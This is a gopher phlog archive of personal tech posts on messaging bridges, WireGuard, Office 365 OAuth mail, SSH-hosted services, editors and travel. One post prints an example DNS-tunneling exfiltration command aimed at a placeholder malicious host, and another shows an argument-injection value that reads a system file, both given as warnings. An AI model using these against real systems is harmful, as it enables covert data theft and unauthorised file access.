gopher://z3bra.org/I/u/sorlag-outside.jpg gopher://z3bra.org/I/u/sorlag-inside.png 20230718.2207

Online messaging

2020-08-25T08:43:00+02:00

Online messaging ────────────────────────────────────────────────────────────────────── An XKCD comic is worth a thousand words. https://imgs.xkcd.com/comics/standards.png There is no standard when it comes to online communication. IRC used to be the way people communicate online. This is not true anymore however, and with all the new protocols, platforms, applications that pop out every now and then, communication is easier than ever ! Easier ? Not so much. To communicate with 3 different groups of people, you need 3 different applications. Be it Facebook Messenger, Telegram, Whatsapp, Matrix, Mattermost, Discord, …, you name it. Each require creating an account, turning on notifications, learning the UI and so on, and so forth. Of course, none of these could agree on a standard way to relay text messages from one device to another! So now this is your problem, as a user, to sort out the problem of switching contexts. But maybe you don't have to… # Matterbridge By relaying messages from one platform the others, [matterbridge][0] is the kind of project that provide an elegant solution to an ugly problem. It creates a bridge between many of the existing messaging platforms, and bridge them together. When a message is received on one platform, the matterbridge gateway will replay this message to all the other platforms configured, so people can effectively talk to each other in a cross-application manner. I use it so I can participate in a local group in my hometown on WhatsApp, which I don't want installed on my personnal phone. It relays all messages on IRC, and to a telegram group, so I can still participate from my phone. # Whatsapp In order to use whatsapp with matterbridge, you need an account (so a phone number), and find a way to "authorize" matterbridge to use this account. The only way to do it (at least for matterbridge v1.18.0), is by tricking whatsapp into thinking that matterbridge is a web browser, so it can use the whatsapp [web version][1]. The web version doesn't replace the original application, so you got to keep it running all the time. As I didn't want whatsapp to run on my phone, I had to find another way. # Android VM The android SDK provide an emulator, that you can run in headless mode. What's happening under the hood is that you get a qemu virtual machine started for your phone's architecture (even x86_64!). The procedure to get whatsapp running on a VM is described here: https://github.com/tulir/mautrix-whatsapp/wiki/Android-VM-Setup This includes feeding the phone's webcam with ffmpeg recording your desktop, so you can scan the QR code created by matterbridge from whatsapp, and allow it to run (you MUST run it in graphical mode at this point, so a working android SDK is needed). Unforturnately, the emulator will only run on Linux, so I couldn't host it on one of my OpenBSD server. To make it simpler, I chose to install a Debian 10, so the SDK installation is easy to do. apt install android-sdk libopengl0 libxdamage1 libtinfo5 libgl1 libegl1-mesa curl -O https://dl.google.com/android/repository/commandlinetools-linux-6609375_latest.zip unzip -d /usr/lib/android-sdk commandlinetools-linux-6609375_latest.zip /usr/lib/android-sdk/tools/bin/sdkmanager 'system-images;android-30;google_apis_playstore;x86_64' emulator /usr/lib/android-sdk/tools/bin/sdkmanager --update You'll need that on both your server and local machine. Then you can create the android emulator locally, and start it: /usr/lib/android-sdk/tools/bin/avdmanager create avd -n whatsapp -k 'system-images;android-30;google_apis_playstore;x86_64' /usr/lib/android-sdk/emulator/emulator -avd whatsapp Once running, install the whatsapp application, connect it to your account and make sure it works. Follow the guide I mentionned earlier to link it to matterbridge. Don't forget to authorize the ADB key fingerprint at boot, so you can later connect to the emulator from the command line. Once done, take a snapshot of the emulator, and shut it down. Your full emulator state should be saved to ~/.android/avd, and the adbkey to ~/.android/adbkey Upload the whole ~/.android to your server, and start the emulator in headless mode: /usr/lib/android-sdk/emulator/emulator -avd whatsapp -no-audio -no-window After some time you should be able to connect to it using `adb shell`. Use this connection to start the application (and eventually, enable the wifi card, if you don't have internet access on the emulator): adb shell 'svc wifi enable' adb shell 'ping web.whatsapp.com' adb shell 'am start -n com.whatsapp/.HomeActivity' At this point, the VM should be up and running, and whatsapp started, and in the foreground ! You can verify it by taking a screenshot: adb shell 'screencap -p' > capture.png In case you want to click on the touchscreen remotely, you can use adb shell 'input X Y' Where X and Y are the coordinates of where you want to click. Not very comfortable to use, but that might be handier than stopping the VM and starting it again locally, snapshot it, reupload, … # Rationale https://imgs.xkcd.com/comics/team_chat.png [0]: https://github.com/42wim/matterbridge [1]: https://web.whatsapp.com 20200825.0843

partage: An HTTP based file sharing system

2021-10-21T14:34:00+02:00

partage: An HTTP based file sharing system ────────────────────────────────────────────────────────────────────── In the past weeks, I had to share files with a company that didn't fit in an email. We're reaching 2022, yet sharing big files anonymously remains a pain in the ass… So I started looking around for self-hosted solutions, and it turns out there are quite a few [0] ! My need was a simple solution that runs on OpenBSD, and that I could link to my family and friends so they can share stuff with me. It must be fairly straightforward to use, with sane default and a low barrier of entry. I first settled on linx-server [1]. It works well without javascript, is fairly simple to install and can interact with httpd(8) over fastcgi! The only thing I missed was the ability to chroot and run with restricted privileges, so I decided to hack those features in. I never really wrote any Go before, but I quickly realized how rich the standard library is! Reading and understanding the code felt familiar coming from C. I quickly added the features I needed, and setup my server. I kept reading the code by curiosity, and that's when my NIH syndrom triggered… A few days later, partage [2] was born! Partage is a simple HTTP server that accept uploads over PUT and POST requests, and store files under randomized names. Each file is set to expire after a defined amount of time, and an external tool (partage-trash(1)) can be used to "collect" expired files (usually in a cronjob). A nice looking landing page is provided by default (with minimal CSS and Javascript) for marketing purposes, but the server can totally work without a front-end. Overall, writing this software was very cool! I'm truly amazed at how simple to use Go is, and how similar to C it feels. The standard libraries are complete, and cross-compiling is a breeze. I'll definitely consider it again for future projects! -- ~wgs [0]: https://github.com/awesome-selfhosted/awesome-selfhosted [1]: https://github.com/ZizzyDizzyMC/linx-server [2]: gopher://z3bra.org/0/projects/partage.txt 20211021.1434

Re: Gopher text rendering ideas

2020-09-25T16:40:00+02:00

Re: Gopher text rendering ideas ────────────────────────────────────────────────────────────────────── So I gave it a quick try using my gopher web proxy. It worked as such: 0. Read the whole text file in memory 1. Search for "\n\n", mark it as end of paragraph 2. Search for " " (3 spaces) inside that paragraph 3.0 No occurence ? Wrap paragraph in

tags 3.1 Matched ? Wrap paragraph in

tags 4. Move pointer past the paragraph 5. Start over till EOF It worked great overall ! I browsed a few holes like this, and all ASCII arts / code snippets rendered perfectly. Actual text paragraphs were also pleasant to read with proportional fonts. However, A few things I didn't think about looked odd, because the

tag reflow text by default. Things like lists, or quoted text looked bad: 1. First item 2. Second item 3. Third item > This was a quoted text with > hard wraps in it, that should definitely > not be reflowed. Some texts or graphic stuff looked odd as well, like banners like this that are 70 char wide: ||<><><><><><><....>|| As a conclusion, I think that my « naive » approach was a bit too naive, so for now I reverted to full monospace font for the time being, until I find a better way to do it, or give up on it entirely. If someone has an idea, feel free to contact me to discuss it ! -- ~wgs 20200925.1640

Reflowing emails with fmt(1)

2020-09-09T14:42:00+02:00

Reflowing emails with fmt(1) ────────────────────────────────────────────────────────────────────── scribo(1) can now filter the message body through a command rather than writing directly to the file. The advantage to this is that I can reformat the mails with, eg. fmt(1), or even turn markdown to HTML, or trim HTML tags. So many possibilities ! This fixes the issue I have when sending mails from my phone which doesn't wrap text at a given column number. This way I can type however I want and rest assured that my entry will be nicely rendered ! EDIT: actually it looks nicer when reflowing with fold(1), as it won't refill lines. -- ~wgs 20200909.1442

Replacing tinc with wireguard

2021-09-28T18:04:00+02:00

Replacing tinc with wireguard ────────────────────────────────────────────────────────────────────── After a few months of heavy procrastination, I finally replaced my old tinc[0] mesh VPN with wireguard[1]. Since version 6.8, OpenBSD now ships with the wg(4) driver by default, providing ifconfig(8) with all the tools required to setup a wireguard VPN. You don't even need the (in)famous wireguard-tools package ! Generating the private key is done with openssl(1): openssl rand -base64 32 y4mJJGiPwpZIauJlZuDSY0f+Dqx8UPD9WGD0fQvzkK4= You can then put it in the /etc/hostname.wg0, along with your peers public keys: # /etc/hostname.wg0 inet 10.0.0.1 255.255.255.240 wgport 51820 wgkey y4mJJGiPwpZIauJlZuDSY0f+Dqx8UPD9WGD0fQvzkK4= wgpeer FbRKfD8E6D/6xIHJqpigq0I6DYe63pF/ak1FArQXoDA= wgendpoint peer1.domain.tld 51820 wgaip 10.0.0.2 wgpeer z6sXdKvJAYnjqL2pTUoG8U+mzj19lcgUdfHXV8pLAkQ= wgendpoint peer2.domain.tld 51820 wgaip 10.0.0.3 up The public key is printed along with the other interface attributes, under the name "wgpubkey". Use ifconfig(8) to get it: doas ifconfig wg0 | grep wgpubkey So far it does the job just as well as tinc, but as it's built into the kernel, no external tool/daemon is required, which is really nice. I also managed to automate the whole setup (generate priv keys, distribute public ones) thanks to drist(1). keep hacking! -- ~wgs [0]: https://tinc-vpn.org [1]: https://wireguard.com 20210928.1804

RIP M$ basic auth support 💀

2022-10-25T18:59:00+02:00

RIP M$ basic auth support 💀 ────────────────────────────────────────────────────────────────────── Microsoft must hate their users. I've seen the news come up a few time, thinking that would be nothing but a joke. But here we are: Basic authentication for microsoft exchange is dead 💀. This means that the only way to authenticate to your office 365 mail box is using the XOAuth2 mechanism. And hear me out, it's a pain! However, I'm not writing this post as yet another rant against microsoft. It is a brain dump of what I did to get it working again, because I'll need it sooner of later (and you'll probably need that too!). # Process This will let you retrieve/send email with isync/msmtp respectively. At the end of the day, you'll still use a username/password, it's just that getting that "password" (XOAUTH2 token) is a pain in the neck. 0. Get a stress ball, put it somewhere close to you 1. Login to https://portal.azure.com with your email account 2. Navigate to the "App Registration" page (use the searchbar) 3. Register a new "app" 3.0 Name it "blebleble" (this is important) 3.1 Select "Single tenant" access 4. Authentication 4.0 Add platform: Mobile + Desktop 4.1 Set redirect URI: http://localhost 4.2 Advanced settings Allow public client flow: YES 5. API Permissions 5.0 Microsoft Graph: (allow them all, really…) - email - offline_access - IMAP.AccessAsUser.All - POP.AccessAsUser.All - SMTP.Send - User.Read 6. Overview: copy "client" and "tenant" ID 7. Download xoauth2.py[0] (modified by me, thank you sir Perlis!) 8. Replace TENANT_ID and CLIENT_ID in the source with your own 8.1 (Optional) edit ENCRYPTION_PIPE/DECRYPTION_PIPE This currently use cat(1). Use a decent crypto tool if you care, like cream[1] or age 9. xoauth2 ~/.cache/o365.token -a 9.0 OAuth2 registration: microsoft 9.1 OAuth2 flow: localhostauthcode 9.2 Account email address: you@coolstory.bro 9.3 Navigate the link 9.4 Accept permissions VOILÀ! 😫🔫 You should now be authorized to read your emails. Use the command `xoauth2 ~/.cache/o365.token` to get your current access token, and use it as your password. Here is my own ~/.mbsyncrc for reference: IMAPAccount o365 Host outlook.office365.com Port 993 User me@coolstory.bro PassCmd "xoauth2 ~/.cache/o365.token" SSLType IMAPS SSLVersions TLSv1.2 TLSv1.3 AuthMech XOAUTH2 Notes: For mbsync, you'll need to install the Cyrus sasl2-xoauth2 module The xoauth2 token is stored unencrypted on disk. Look for ENCRYPTION_PIPE and DECRYPTION_PIPE in xoauth2.py to handle encryption is you care (current encryption tool: cat(1)). -- ~wgs [0]: gopher://z3bra.org/0/notes/xoauth2.py [1]: gopher://z3bra.org/0/projects/cream.txt 20221025.1859

SSH as a public service

2022-08-23T17:26:00+02:00

SSH as a public service ────────────────────────────────────────────────────────────────────── As the HTTP protocol becomes more and more ubiquitous for online services, I've looked into other protocols that could expose services online. It turns out that ssh is a perfect candidate for that ! I've seen a couple examples in the wild, and there might be more: ssh kiosk@bitreich.org ssh play@ascii.town So I decided to look into it myself, and set it up on my OpenBSD server. 0. Service program ------------------ First, you'll need a program to provide your service. We'll make a program that gives the current day. # cat < /usr/local/bin/today.sh #!/bin/sh date '+%A !' EOF # chmod +x /usr/local/bin/today.sh # /usr/local/bin/today.sh Tuesday ! You'll probably want something more useful, and we'll get to it later on. For now, this will be enough. 1. Service account ------------------ It all starts with an account, that you'll use to connect to the machine, and run the program. This account must not have a password, and have restricted rights to the system resources. So let's first create a login class for these users, to limit its resource usage on the system: # cat < /etc/login.conf.d/sshervice sshervice:\ :path=/bin /usr/bin /usr/local/bin:\ :umask=022:\ :datasize=1024M:\ :maxproc=32:\ :openfiles=128:\ :stacksize=1M:\ :filesize=512M: EOF # cap_mkdb /etc/login.conf See login.conf(5) for how to tweak these values to your likings. # groupadd _sshervice # adduser -d /var/sshervice \ -L sshervice \ -g _sshervice \ -s /bin/sh \ -p '' \ today At this point, you should be able to get a shell for your service account without specifying a password (try as non-root user): $ su - today $ /usr/bin/whoami today $ pwd /var/sshervice 2. SSH access ------------- You can login as this user, but it shouldn't be accessible from the outside, because of how unsecure it is (at least that's the case on OpenBSD). Thanks to the "Match" keyword, OpenSSH can apply specific configuration bits to a user or a group (see sshd_config(5) for details). So we'll use that: # cat < /etc/ssh/sshd_config_sshervice Match User today ForceCommand /usr/local/bin/today.sh Match Group _sshervice PasswordAuthentication yes PermitEmptyPasswords yes DisableForwarding yes ForceCommand /sbin/nologin MaxSessions 5 EOF # echo 'Include sshd_config_sshervice' >>/etc/ssh/sshd_config # rcctl restart sshd 3. Final result --------------- $ ssh today@cooldomain.tld Tuesday ! 4. Going further ---------------- From there, it's all a matter of providing cool and/or useful services, so you'll have to improve what's running as the "ForceCommand" of your user. Here are a few tips, in no particular order: --- Read login.conf(5) and sshd_config(5). Really, do it. --- Remember that you're giving strangers the ability to run programs on your server. Take extra care to not provide them the ability to get access to a shell. For example: #!/bin/sh date "$1" This looks harmless, but passing it "-f/dev/passwd" would yield its full content. So take extra care with the commands you allow ! --- Worth mentionning is that you can chroot(8) your service over ssh with the following line under the "Match" block of sshd_config(5): ChrootDirectory /var/sshervice This require to setup a proper chroot for your service to run the program correctly. --- Never trust user input. --- use environment variable `$SSH_ORIGINAL_COMMAND` to allow users to specify commands. Given the following script: #!/bin/sh date -- "+${SSH_ORIGINAL_COMMAND:-%A !}" You can now specify the date format on the command line: $ ssh today@cooldomain.tld Tuesday ! $ ssh today@cooldomain.tld %Y-%m-%d 2022-08-23 --- Prefer self-contained programs over scripts. Ideally statically link and chroot them. --- If your program requires a TTY to run (like a pager for example), don't forget to pass `-t` when you specify a command over ssh, because it does not allocate a pseudo tty by default when passing arguments. Imagine an online man page service: #!/bin/sh man "${SSH_ORIGINAL_COMMAND:-man}" Make sure to add -t to force a pseudo TTY allocation for the pager to work: $ ssh -t man@cooldomain.tld sshd_config 20220823.1726

The gophirst approach

2020-09-13T16:47:00+02:00

The gophirst approach ────────────────────────────────────────────────────────────────────── Plain text makes things easier. That's why I like gopher more and more, and want to make gopher my main way to publish content on the internet. However, I am not ready to completely abandon the web. I still want eveeything to be accessible online by people using the inferior HTTP protocol. That's from this idea that I started phroxy [0], an inetd(8) http to gopher proxy. You can clone the project over git: git clone git://z3bra.org/phroxy.git It is far from ready, but can already serve text files ! The goal will be to ressemble something like what's running at proxy.vulpes.one [1]. As I could not find the code for it, I decided to write my own. Using floodgap's gatewqy is not really an option I consider, as they lack UTF-8 support. That's per the RFC1436, but I believe that gopher content is better served as UTF-8 than US-ASCII. -- ~wgs [0]: gopher://z3bra.org/scm/phroxy [1]: https://proxy.vulpes.one 20200913.1647

TLS-sending guarantee @posteo.de

2020-10-20T20:31:00+02:00

TLS-sending guarantee @posteo.de ────────────────────────────────────────────────────────────────────── Today, an internet fellow reported to me a strange issue he had when sending me emails from his @posteo.de address. The mail bounced with the following error: “ TLS is required, but was not offered by host „ What ? I run opensmtpd, whose configuration includes the following line: listen on egress tls pki lucy.z3bra.org This makes the server listen on port 25, and accept securing the connection with the STARTTLS command. A quick telnet demonstrates that it works as expected: 220 lucy.z3bra.org ESMTP OpenSMTPD HELO sweetie 250 lucy.z3bra.org Hello sweetie [redacted], pleased to meet you STARTTLS 220 2.0.0 Ready to start TLS So what is posteo really complaining about ? After searching a bit, I found that they have an option called « TLS-sending guarantee », (off by default). See their article on TLS-sending guarantee for further details [0]: “ As standard, before sending each email, Posteo attempts to create an encrypted connection with other email servers. If the TLS-sending guarantee is activated for your account, we will only send your email if it can be securely delivered to the recipient. „ My guess is that TLS is checked by connecting to port 465 first, and consider it « unsafe » if connection is refused. It is probable that checking STARTTLS is costly in terms of resources, because it means restarting an already established connection. Of course, opensmtpd supports that, and the configuration was *extremely* easy: listen on egress smtps pki lucy.z3bra.org You learn something new everyday ! -- ~wgs [0]: https://posteo.de/en/help/activating-tls-sending-guarantee 20201020.2031

Trip to Reunion Island

2020-10-14T19:34:00+02:00

Trip to Reunion Island ────────────────────────────────────────────────────────────────────── The Reunion Island is a marvelous place, full of magnificent mountains, wonderful lagoons and delicious people. We went there with my girlfriend for the past two weeks, hiking and diving all around the island. It is a volcanic island whose volcano is one of the most active on earth. # Salazie caldeira This is the first caldeira we went to, directly after landing, and we visited the nice little village of Hell-bourg. The next day we went to the « Trou de fer » by the Bélouve forest. The view point there is impressive ! # Mafate caldeira The next day, we went to Marla, a village in the Mafate caldeira. We walked there because these caldeira is only accessible by foot, or helicopter. The hike is beautiful, however we had fog during the morning so we couldn't see much of the panorama. ! Marla is pretty small, and most people living here are renting rooms to hikers. There is a school however (with 10 kids !), and a snack, « chez Jimmy » which sells ti punches to everyone passing by ! # East coast, or « windy coast » There is not much to see here in my opinion, besides the vanilla cooperative. There is way more to see in the south ! # South - The lava road The main thing to see in the south is of course the lava road, which crosses the old lava flows, that reach the ocean. Their size is impressive and all those rocky lava floors make for a desolated view. # South - Everything else This region is beautiful. The weather is much nicer, and there are a lot of "lava beach" and other funny stuff to see. There are also many water falls cause by erosion. # West coast, the lagoons The lagoons are the only safe places for a bath in the ocean, because of shark presence around the island. There is a natural coral barrier, which makes the lagoon a safe place for snorkeling. You really get to see fishes of various sizes, shapes and colours. It was incredible to see that much fishes ! # Cilaos caldeira I got to experience alpinism for the very first time, and it was incredible ! We climhed the famous « 3 Salazes », right between the Mafate and Cilaos caldeiras. The view was beautiful on both side, and impressive too, as sometimes I was walking on traces barely 20cm wide ! Other than that, Cilaos is the third caldeira of the island, and it is known for their lentils, so we definitely had to eat some ! # Last word Reunion Island is a really nice place. I loved how you can switch from the mountains to the lagoon in less than an hour. The food was also pretty good (especially the « Rougail saucisse » !). I hope I'll get to go back there someday !! Oh and btw, here is a quick montage of a few pics I took there: gopher://z3bra.org/I/u/reunion-2020.png -- ~wgs 20201014.1934

Using DNS to bypass hotspot WiFi

2020-09-26T13:42:00+02:00

Using DNS to bypass hotspot WiFi ────────────────────────────────────────────────────────────────────── I took the plane yesterday, and realized that some companies now « offer » a free wifi service on-board, so you can access the internet while flying. They don't really offer anything though, as you must register your email address on a captive portal, and even pay a fee to get full internet access (instead of just « messaging apps »). I tried to access the internet using curl(1) directly, to see if you could use protocols like gopher, or even smtp without registering. Turns out you can't. However, I noticed that I could resolve all the hostnames I wanted ! Which means DNS request reach the internet without needing you to register on the portal. It immediately reminded me a technique I read about in the past, and forgot: DNS tunneling. DNS tunneling is usually used as a data exfiltration method in cybrr attack. It assumes DNS traffic goes to the internet unfiltered, so a malware can use DNS queries to export data to an external server. For example: pl=$(echo "hidden data" | base64) dig +short TXT $pl @gimmedata.ns1.malicious.tld The data can then be retrieved from the logs, or a modified DNS server could even reconstruct it. This is bad though, and you shouldn't do it. However, abusing the DNS payload to send data over the internet is an interesting idea. Instead of exfiltrating data, you could use the remote DNS as a proxy or VPN, and access the clearnet by wrapping all your outgoing traffic in DNS queries, that would be replayed by the external server, and responded via DNS replies ! It could work i theory, but has 2 major downsides: first, it would be horribly slow. The DNS payload is limited to something like 512 bytes, so that means fragmenting your traffic so it fits in a DNS request. Same for replies. The second drawback is that it generates a lot of DNS traffic, potentially marking you as an attacker in the network you're trying to bypass, which could lead to problems. I though it was a fun idea to explore, and I wonder if such a proxying method has been tested already ? Having such a DNS web proxy in your toolbox could be pretty helpful from time to time ! -- ~wgs 20200926.1342

Vis: Vim Improved, on Steroids

2023-07-07T01:15:00+02:00

Vis: Vim Improved, on Steroids ────────────────────────────────────────────────────────────────────── Ok it's a clickbait. But hey, you might as well keep reading now! I've been using vis[0] as my main editor for a few years now, and decided to make this post to bring attention onto it. But first, let's have some context. Vim === I've been using Vim for a very long time (prior to may 2013, according to git). During this time, I went through most of the phases of a good Vim fanboy: - ^C^C^C^Cquit^Mend^Mexit^M*reboot* - Using normal mode just for HJKL - Use HJKL in Every. Single. Application. - Join the crusades against Emacs - Changing my .vimrc every 5 second - Read the Arabesque blog[1] a 1000 times - Have 34792492 plugins, with 5 different plugin managers - Have 0 plugin because THIS IS TRUE VIM - rm ~/.vimrc because THIS IS TRUE VIM - Play vimgolf all day - … But after some time of being a happy little Vim user, I fell into the Plan9 trap. Acme, Sam, Wily! Three editors centered around the mouse, just as I conviced myself that I didn't need a mouse, and that keyboard-centric interfaces are the future, a cute little thing named Glenda[2] brought me down her rabbit hole... I used Vim for so long at this point that I didn't see myself changing editor, but it still got me curious: what is so powerful about these editors, that so many people praise them ? I've read many papers, blogs, whatched videos to learn about Acme and Sam and their strength. That's where I learnt about Sam's Structural Regular Expressions: https://doc.cat-v.org/bell_labs/structural_regexps/se.pdf I kept reading about Sam, and it made me realize Vim's greatest weakness: It deals with lines of text. This does not seem like a big deal, but it makes a huge difference! Imagine the following code: int foo = 0; foo = random() % 16; if (foo > 7) { foo = do_stuff(foo) } return foo; Now assume we want to change a few things: 0. rename "foo" to "bar" 1. remove the useless "= 0" 2. add the missing ; on line 4 How would we do these with Vim commands ? 0. :%s/foo/bar/g 1. :1s/ = 0// (or "ggt=dt;") 2. :4s/$/;/ (or "4GA;") Do you notice the pattern ? Even though Vim has :change, :delete and :append/:insert commands, we used :substitute for all of them! Think about it the next time you use Vim. The substitute command is used 90% of the time when using commands. Here's how you'd do it with Sam now: 0. x/foo/ c/bar/ 1. 1x/ = 0/ d 2. 4x/$/ a/;/ The x command eXtracts the selected text and runs a command on it, for each selection separately. This is a very powerful concept, as it lets you manipulate the text as a whole, rather than only interacting with it one line at a time. The sam language has even more powerful features which are described in its tutorial: http://doc.cat-v.org/bell_labs/sam_lang_tutorial/sam_tut.pdf Unfortunately for me, and even though Sam has a very powerful command language, navigating the file is done exclusively with the mouse. And I could just not give up on the muscle memory I built over all these years of using Vim. So what were my options ? Going back to Vim, after seing the greener side of the grass ? Give up on Vim, and the power of modal editing ? Vis === There was a third option of course: Vis ! When I first found about it, vis was a small project seeking to provide "90% of the features of Vim, in 10% of the code". This was immediately appealing to me, and I immediately tried it. It had rough edges, and I missed a few features, but it was clean and fast. Then the project became more mature, and a new feature appeared: The Sam language was implemented into it. I was thrilled! Vis combines the strength of both Vim and Sam into what I believe is the ultimate text editor. Selections (or DOT) benefits from Vim "visual" mode, allowing one to edit different portions of the file at the same time, with multiple cursors. And to put the icing on the cake, you can write plugins for it using Lua. Whether you're a plan9 fan looking for a good Sam implementation, or an avid Vim user, I urge you to try it, and embrace the other side of the text editing that you're going to learn. Acme ==== Of course, I could not end this post without talking about Acme[3], which I believe is the next step of editing evolution. I'm however too scared to really commit to it, and buy a 3 buttons mouse for this sole purpose (but I know I will, someday). However, there is a middleground: Edit[4]! This project has not been updated in a long time, but looks like a marvelous concept that I would like to explore in the future. Maybe the next (last?) step is Vim + Sam + Acme ? -- ~wgs [0]: https://github.com/martanne/vis [1]: https://blog.sanctum.geek.nz/category/vim [2]: http://glenda.cat-v.org [3]: http://acme.cat-v.org [4]: https://c9x.me/edit 20230707.0115

Write code on a phone

2020-09-14T16:11:00+02:00

Write code on a phone ────────────────────────────────────────────────────────────────────── I recently injured my wrist. Not sure if it's because of my recent intensive climbing session, or coding session, but it sure hurts a lot to type on a keyboard now ! I have a bunch of cool projects going on though, so I had to find a way to keep coding without adding more tension to my wrist. And I found a « solution » : My phone. In portait mode, the keyboard is small enough that I don't have to move my thumb much, so my wrist stay cool about it. And as I run a full Linux (SailfishOS [0]), I benefit from all the bells and wistles you get on linux, like vi, git, make, ssh, rsync, ... The default terminal, however, is a piece of shit when it comes to curses interfaces, because it uses a drop-down screen over the keyboard. So when you type, the screen move up to show the keyboard, and you can't see the top of the window anymore, which usually where your cursor is in the vi editor. Here too, I found a « solution » : ed(1). And to be honest, now that I got used to it, I prefer doing line-based editing on the phone rather than a full screen editor. The space is scarce on-screen, and I usually edit stuff over 3G links, so ed(1) performs better in both cases ! So here I am: - Injured. - Coding on a phone. - Using ed(1). I fell like a sadomasochist. Except the goal is to feel LESS pain. There is one /real/ benefit to code on your phone though. When you take a shit, and find a solution to your problem, you can try it right away ! 😉 -- ~wgs [0]: https://sailfishos.org 20200914.1611